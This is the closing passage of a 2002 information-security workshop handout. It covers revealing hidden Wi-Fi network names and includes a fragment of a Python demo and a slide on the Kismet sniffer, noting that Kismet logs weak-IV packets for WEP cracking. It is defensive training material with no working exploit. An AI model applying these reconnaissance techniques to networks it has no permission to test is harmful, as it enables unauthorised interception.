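    print("after probe response:", observed_ssids([hidden, probe_response(b"PISA-DEMO", bytes.fromhex("000000000002"))]))
```

NetStumbler relies on probe requests and beacons with a name, so it lists a silent AP only by BSSID; Kismet, which keeps the card in RFMON and watches every frame, fills in the SSID the moment a legitimate client probes or associates.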

Page 77: Section 8

Page 78: The Powerful WLAN Tool: Kismet

• http://www.kismetwireless.net/
• Passive network sniffer (runs the card in RFMON mode)
• Client/server architecture
• Logs packets with cryptographically weak IVs, ready for a WEP cracker
• Used by German federal authorities (26 July 2002)
• Platforms: Intel (x86), iPaq/ARM, Zaurus/ARM

Page 79: Contributors

The workshop was jointly presented by PISA members Alan Tam [email protected], Jim Shek [email protected], Marco Ho [email protected] and Young, Wo Sang [email protected] on 27 July 2002, the eve of PISA's first anniversary.

Remark: another valuable presentation on the theoretical part is the PISA seminar "Critical Security Issues on Wireless LAN" by Ray Hunt, 13 June 2002, http://www.pisa.org.hk/event/wlan_sec.pdf

Page 80: Copyright and Disclaimer

Copyright: Professional Information Security Association (PISA) owns the copyright of this presentation. Any party may quote the whole or part of it in an undistorted manner and with a clear reference to PISA.

Disclaimer: This is the handout of a presentation workshop. The points made here are kept concise for the purpose of presentation. If you require details of tests and implementation, please refer to the technical references.